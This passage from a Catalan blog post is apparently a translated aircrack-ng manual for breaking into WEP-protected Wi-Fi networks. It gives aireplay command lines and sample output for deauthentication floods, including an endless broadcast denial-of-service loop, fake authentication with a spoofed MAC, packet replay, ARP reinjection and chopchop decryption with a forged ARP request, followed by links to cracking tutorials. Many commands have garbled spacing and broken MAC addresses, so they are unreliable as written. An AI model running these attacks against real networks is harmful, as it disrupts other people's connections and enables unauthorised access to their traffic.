      airmon.sh start wlan0 airodump wlan0 out juny  (canvia a una altra consola)
      aireplay -0 10-a 00:13:10:30:24:9 C wlan0 aireplay -3-b 00:13:10:30:24:9 C - h 00:09:5 B: EB: C5: 2B wlan0

      Després d’enviar tres tandes de paquets de deautenticación, comencem a escoltar a la recerca de peticions ARP amb l’atac 3. L’opció-h és essencial i ha de ser l’adreça MAC d’un client associat.

      Si el controlador és wlan-ng, has d’executar l’script airmon.sh, altrament la targeta no estarà preparada correctament per a la injecció.

    • Denegació de servei massiva amb una targeta RT2500
      airmon.sh start ra0 aireplay -0 0-a 00:13:10:30:24:9 C ra0

      Amb el paràmetre 0, aquest atac enviarà en un bucle infinit paquets de deautenticación a les adreces de broadcast, evitant així que els clients estiguin connectats.

  • Atac 1: autenticació falsaAquest atac és particularment útil quan no hi ha clients associats: creem l’adreça MAC d’un client fals, la qual quedarà registrada a la taula d’associació del AP. Aquesta adreça serà usada per als atacs 3 (reinjecció de peticions ARP) i 4 (desencriptació WEP “chopchop”). És millor preparar la targeta amb la MAC usada (baix, 00:11:22:33:44:55) de manera que el controlador enviï ACK de forma adequada.De tota manera si aquest atac falla i ja hi ha un client associat, és més efectiu usar simplement la seva adreça MAC (aquí, 00:09:5 B: EB: C5: 2B) pels atacs 3 i 4.
    ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up aireplay -1 0-i "el ssid"-a 00:13:10:30:24:9 C-h 00:11: 22:33:44:55 ath0 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-)
    Amb els CVS 2005.08.14 madwifi “parxeats”, és possible injectar paquets, en mode Infraestructura (la clau WEP en si mateixa no importa, mentre que el AP accepti autenticació oberta). Pel que, en lloc d’usar l’atac 1, pots només associar i injectar / monitoritzar a través de la interfície athXraw:

    ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid "el ssid" key aaaaaaaaaa ifconfig ath0 up sysctl-w dev.ath0.rawdev = 1 ifconfig ath0raw up airodump ath0raw out 6

    Llavors pots executar l’atac 3 o el 4 (a sota, aireplay reemplaçarà automàticament ath0 per ath0raw):

    aireplay -3-h 00:11:22:33:44:55-b 00:13:10:30:24:9 C ath0 aireplay -4-h 00:10:20:30:40:50-f 1 ath0

    Alguns punts d’accés requereixen reautenticación cada 30 segons, si no el nostre client fals serà considerat desconnectat. En aquest cas utilitza el retard de re-associació periòdica:

    aireplay -1 30-i "el ssid"-a 00:13:10:30:24:9 C-h 00:11:22:33:44:55 ath0

    Si aquest atac sembla fallar (aireplay roman enviant paquets de petició d’autenticació), pot ser que estigui sent usat un filtrat d’adreces MAC. Assegura’t també que:

    • Estàs prou a prop del punt d’accés.
    • El controlador està correctament “parxeat” i instal lat.
    • La targeta està configurada en el mateix canal que el AP.
    • El BSSID i el vostre Wireless (opcions-a /-e) són correctes.
    • Si es tracta d’Prism2, assegura’t que el microprogramari està actualitzat.

    Com a recordatori: no pots injectar amb un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom causa de limitacions de firmware i / o controlador.

  • Atac 2: Reenviament interactiu de paquetsAquest atac et permet escollir un paquet donat per reenviar, de vegades proporciona resultats més efectius que l’atac 3 (reinjecció automàtica d’ARP).Podries usar-lo, per exemple, per intentar l’atac “redifondre qualssevol dades”, el qual només funciona si l’AP realment reencripta els paquets de dades WEP:
    aireplay -2-b 00:13:10:30:24:9 C-n 100-p 0841 \-h 00:09:5 B: EB: C5: 2B-c FF: FF: FF: FF: FF: FF ath0

    També pots fer servir l’atac 2 per reenviar manualment paquets de peticions ARP encriptacas amb WEP que pesa bé 68 o 86 bytes (depenent del sistema operatiu):

    aireplay -2-b 00:13:10:30:24:9 C-d FF: FF: FF: FF: FF: FF \-m 68-n 68-p 0841-h 00:09:5 B: EB: C5 : 2B ath0 aireplay -2-b 00:13:10:30:24:9 C-d FF: FF: FF: FF: FF: FF \-m 86-n 86-p 0841-h 00:09:5 B: EB: C5: 2B ath0
  • Atac 3: reinjecció de petició ARPEl clàssic atac de reinjecció de petició ARP és el més efectiu per generar nous IVs, i funciona de forma molt eficaç. Necessites o l’adreça MAC d’un client associat (00:09:5 B: EB: C5: 2B), o bé la d’un client fals de l’atac gener (00:11:22:33:44:55). Pot ser que hagis d’esperar un parell de minuts, o fins i tot més, fins que aparegui una petició ARP, aquest atac fallarà si no hi ha trànsit.Si us plau, fixeu-vos que també pots reutilitzar una petició ARP d’una captura anterior usant l’interruptor-r.
    aireplay -3-b 00:13:10:30:24:9 C-h 00:11:22:33:44:55 ath0 Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. read 2493 packets (got 1 ARP requests), sent 1.305 packets ...
  • Atac 4: El “chopchop” de Korek (predicció de CRC)Aquest atac, quan té èxit, pot desencriptar un paquet de dades WEP sense conèixer la clau. Fins i tot pot funcionar amb WEP dinàmica. Aquest atac no recupera la clau WEP en si mateixa, sinó que revela simplement el text pla. De qualsevol manera, la majoria dels punts d’accés no són en absolut vulnerables. Alguns poden en principi semblar vulnerables però en realitat tiren els paquets menors de 60 bytes. Aquest atac necessita com a mínim un paquet de dades WEP.
    1. Primer, desencriptats un paquet:
      aireplay -4-h 00:09:5 B: EB: C5: 2B ath0
    2. Fem una ullada a l’adreça IP:
      tcpdump-s 0-n-i-r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...]
      IP 192.168.1.2> 192.168.1.255: icmp 64: echo request seq 1
    3. Ara, forjat una petició ARP.La IP inicial no importa (192.168.1.100), però la IP de destinació (192.168.1.2) ha de respondre a peticions ARP. L’adreça MAC inicial ha de correspondre a una estació associada.
      . / Arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9 C \ 00:09:5 B: EB: C5: 2B 192.168.1.100 192.168.1.2 arp.cap
    4. I reenviem la nostra petició ARP forjada:
      aireplay -2-r arp.cap ath0
      
      També podem visitar :http://www.seguridadwireless.net/hwagm/traduccion-aircrack-ng.html
      Gràcies a http://gabaon.bravehost.com/aircrack_doc_es.htm
      Manual aircrack con inalámbrica intel 4965 (driver iwlagn): http://www.forosuse.org/forosuse/showthread.php?t=23581
      Manuals: http://www.sinplan.es/articulo/linux/crackear-una-red-wireless-wep-con-backtrack-3-en-live-cd-desde-windows
      http://linuxman.blogsome.com/2008/03/16/auditando-contrasenas-wep-en-7-pasos/
      http://www.taringa.net/posts/ebooks-tutoriales/2715601/Crackear-Wifi-WEP-y-WPA-con-Ubuntu.html
      http://jarvega.wordpress.com/2007/07/28/crackear-redes-wep/
      http://www.elhacker.net/manual_hacking_wireless_en_linux.html
      http://www.taringa.net/posts/ebooks-tutoriales/2715601/Crackear-Wifi-WEP-y-WPA-con-Ubuntu.html
      http://wifitech.wordpress.com/acerca-de/
      http://luigys.blogspot.com/
Anuncis

Deixa un comentari

Fill in your details below or click an icon to log in:

WordPress.com Logo

Esteu comentant fent servir el compte WordPress.com. Log Out / Canvia )

Twitter picture

Esteu comentant fent servir el compte Twitter. Log Out / Canvia )

Facebook photo

Esteu comentant fent servir el compte Facebook. Log Out / Canvia )

Google+ photo

Esteu comentant fent servir el compte Google+. Log Out / Canvia )

S'està connectant a %s

 
%d bloggers like this: